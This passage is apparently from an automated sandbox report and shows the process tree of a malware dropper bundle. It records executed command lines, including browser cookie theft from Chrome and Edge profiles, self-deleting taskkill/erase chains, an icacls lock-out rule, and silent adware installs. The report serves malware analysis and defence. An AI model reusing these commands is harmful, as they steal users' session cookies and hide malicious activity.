                                                                                                                                                                    "C:\Users\Admin\Documents\j_K8boFlz3UlRd5HTaTJcKgw.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:2344
                                                                                                                                                                    • C:\Users\Admin\Documents\j_K8boFlz3UlRd5HTaTJcKgw.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\j_K8boFlz3UlRd5HTaTJcKgw.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:2768
                                                                                                                                                                    • C:\Users\Admin\Documents\AT3YoF5H_ljr5LRRWUWE7omQ.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\AT3YoF5H_ljr5LRRWUWE7omQ.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:2312
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "AT3YoF5H_ljr5LRRWUWE7omQ.exe" /f & erase "C:\Users\Admin\Documents\AT3YoF5H_ljr5LRRWUWE7omQ.exe" & exit
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:2716
                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                            taskkill /im "AT3YoF5H_ljr5LRRWUWE7omQ.exe" /f
                                                                                                                                                                            8⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:2856
                                                                                                                                                                      • C:\Users\Admin\Documents\_t8ZyPABKgs6EcXmOkRwN45V.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\_t8ZyPABKgs6EcXmOkRwN45V.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:2424
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:2556
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:2332
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:4664
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                7⤵
                                                                                                                                                                                  PID:4996
                                                                                                                                                                              • C:\Users\Admin\Documents\ZPCQGjPFU_j_AttTeudG7HTs.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\ZPCQGjPFU_j_AttTeudG7HTs.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:2376
                                                                                                                                                                              • C:\Users\Admin\Documents\NYiYYotTeJ2EGtHZoqcrJsB0.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\NYiYYotTeJ2EGtHZoqcrJsB0.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:2440
                                                                                                                                                                              • C:\Users\Admin\Documents\mbG_lPwFLr1MKbwwjPgJyvwO.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\mbG_lPwFLr1MKbwwjPgJyvwO.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:2480
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im mbG_lPwFLr1MKbwwjPgJyvwO.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\mbG_lPwFLr1MKbwwjPgJyvwO.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                    7⤵
                                                                                                                                                                                      PID:2732
                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                        taskkill /im mbG_lPwFLr1MKbwwjPgJyvwO.exe /f
                                                                                                                                                                                        8⤵
                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                        PID:2912
                                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                        timeout /t 6
                                                                                                                                                                                        8⤵
                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                        PID:2996
                                                                                                                                                                                  • C:\Users\Admin\Documents\ngApNI_Ian0T3Yh_4SFLiMq2.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\ngApNI_Ian0T3Yh_4SFLiMq2.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:2644
                                                                                                                                                                                    • C:\Users\Admin\Documents\GFkMNcmIQh3SU9oZac2WLUIj.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\GFkMNcmIQh3SU9oZac2WLUIj.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:2656
                                                                                                                                                                                      • C:\Users\Admin\Documents\6D_PR3LMOCfIGe70HQJHyU3z.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\6D_PR3LMOCfIGe70HQJHyU3z.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:2668
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "6D_PR3LMOCfIGe70HQJHyU3z.exe" /f & erase "C:\Users\Admin\Documents\6D_PR3LMOCfIGe70HQJHyU3z.exe" & exit
                                                                                                                                                                                            7⤵
                                                                                                                                                                                              PID:2896
                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                taskkill /im "6D_PR3LMOCfIGe70HQJHyU3z.exe" /f
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                PID:2120
                                                                                                                                                                                          • C:\Users\Admin\Documents\rBixcjB_tdOdd7w07X5bUm9e.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\rBixcjB_tdOdd7w07X5bUm9e.exe"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:2676
                                                                                                                                                                                            • C:\Users\Admin\Documents\foG5Bm9YyFJ5FehCfFHvEWSw.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\foG5Bm9YyFJ5FehCfFHvEWSw.exe"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:2684
                                                                                                                                                                                                • C:\Users\Admin\Documents\foG5Bm9YyFJ5FehCfFHvEWSw.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\foG5Bm9YyFJ5FehCfFHvEWSw.exe"
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                    PID:4000
                                                                                                                                                                                                • C:\Users\Admin\Documents\2rHGj1dudUyLkT0vlRyWCagL.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\2rHGj1dudUyLkT0vlRyWCagL.exe"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:2748
                                                                                                                                                                                                    • C:\Users\Admin\Documents\2rHGj1dudUyLkT0vlRyWCagL.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\2rHGj1dudUyLkT0vlRyWCagL.exe" -q
                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                        PID:368
                                                                                                                                                                                                    • C:\Users\Admin\Documents\lYS8kzd6dRbJFVzB9svtZ_rb.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\lYS8kzd6dRbJFVzB9svtZ_rb.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:2740
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\5454123.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\5454123.exe"
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                            PID:2608
                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 2608 -s 1728
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                              PID:2280
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\5864949.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\5864949.exe"
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                              PID:2932
                                                                                                                                                                                                          • C:\Users\Admin\Documents\SgqjkK09u4iHOKnn2FeufoU3.exe
                                                                                                                                                                                                            "C:\Users\Admin\Documents\SgqjkK09u4iHOKnn2FeufoU3.exe"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:2732
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\2806651.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\2806651.exe"
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                  PID:3068
                                                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 3068 -s 1724
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                    PID:1392
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\2644214.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\2644214.exe"
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                    PID:2096
                                                                                                                                                                                                                • C:\Users\Admin\Documents\9Phvd9m4Q_gR9zoMgg9pnscn.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Documents\9Phvd9m4Q_gR9zoMgg9pnscn.exe"
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                    PID:3056
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-3U3L2.tmp\9Phvd9m4Q_gR9zoMgg9pnscn.tmp
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-3U3L2.tmp\9Phvd9m4Q_gR9zoMgg9pnscn.tmp" /SL5="$201A4,138429,56832,C:\Users\Admin\Documents\9Phvd9m4Q_gR9zoMgg9pnscn.exe"
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                        PID:1360
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-Q6OJ8.tmp\Setup.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-Q6OJ8.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                            PID:544
                                                                                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"
                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                PID:3112
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 276
                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                  PID:2364
                                                                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe
                                                                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"
                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                  PID:4512
                                                                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                    PID:4504
                                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a
                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                        PID:2324
                                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe
                                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                        PID:2600
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-HTQLP.tmp\GameBoxWin32.tmp
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-HTQLP.tmp\GameBoxWin32.tmp" /SL5="$202E8,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                            PID:3928
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-VP1HO.tmp\Daldoula.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-VP1HO.tmp\Daldoula.exe" /S /UID=burnerch2
                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                PID:2244
                                                                                                                                                                                                                                                • C:\Program Files\VideoLAN\ZSLRJBAHTM\ultramediaburner.exe
                                                                                                                                                                                                                                                  "C:\Program Files\VideoLAN\ZSLRJBAHTM\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                    PID:4592
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-4488V.tmp\ultramediaburner.tmp
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-4488V.tmp\ultramediaburner.tmp" /SL5="$600FA,281924,62464,C:\Program Files\VideoLAN\ZSLRJBAHTM\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                        PID:4044
                                                                                                                                                                                                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                                          "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                                            PID:4080
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\36-73d79-345-52cae-ab6c2a1e930b0\SHadaepumuxo.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\36-73d79-345-52cae-ab6c2a1e930b0\SHadaepumuxo.exe"
                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                          PID:4656
                                                                                                                                                                                                                                                          • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                              PID:4240
                                                                                                                                                                                                                                                            • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                              "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                PID:4476
                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4476 CREDAT:275457 /prefetch:2
                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                    PID:3000
                                                                                                                                                                                                                                                                • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                  "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483
                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                    PID:3164
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\f1-a3371-556-4f39d-7cd20b2368e36\Muhaejifacae.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\f1-a3371-556-4f39d-7cd20b2368e36\Muhaejifacae.exe"
                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                    PID:3980
                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qnn4patn.va5\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                        PID:2064
                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2afjf1cp.4op\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                          PID:4048
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2afjf1cp.4op\installer.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\2afjf1cp.4op\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                                                              PID:4100
                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qvdeskjl.sok\ufgaa.exe & exit
                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                              PID:4464
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\qvdeskjl.sok\ufgaa.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\qvdeskjl.sok\ufgaa.exe
                                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                                  PID:2936
                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r2bz4slz.jio\anyname.exe & exit
                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                  PID:4972
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\r2bz4slz.jio\anyname.exe
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\r2bz4slz.jio\anyname.exe
                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                      PID:2736
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\r2bz4slz.jio\anyname.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\r2bz4slz.jio\anyname.exe" -q
                                                                                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                                                                                          PID:1828
                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe
                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"
                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                PID:4472
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                    PID:4784
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                      PID:3772
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                        PID:4664
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                          PID:1864
                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                          PID:3292
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628118543 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                              PID:1264
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                  PID:1056
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0D6E8ED4\sonia_6.exe
                                                                                                                                                                                                                                                                                    sonia_6.exe
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                                                    PID:1308
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                      PID:1572
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                      PID:2356
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                        PID:4420
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                          PID:4488
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:1772
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 268 -s 412
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:1596
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0D6E8ED4\sonia_1.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zS0D6E8ED4\sonia_1.exe" -a
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                  PID:2008
                                                                                                                                                                                                                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                  PID:1992
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                    PID:980
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\E7C0.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\E7C0.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:2752
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\E7C0.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\E7C0.exe
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:2388
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                          icacls "C:\Users\Admin\AppData\Local\67b484c7-c756-4697-a953-ab623e3cdca0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                          PID:3508
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\E7C0.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\E7C0.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:3640
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\E7C0.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\E7C0.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                PID:3868
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\0e406f64-cf54-4a93-970f-aaf0380891e2\build2.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\0e406f64-cf54-4a93-970f-aaf0380891e2\build2.exe"
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:3172
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\0e406f64-cf54-4a93-970f-aaf0380891e2\build2.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\0e406f64-cf54-4a93-970f-aaf0380891e2\build2.exe"
                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                        PID:2908
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
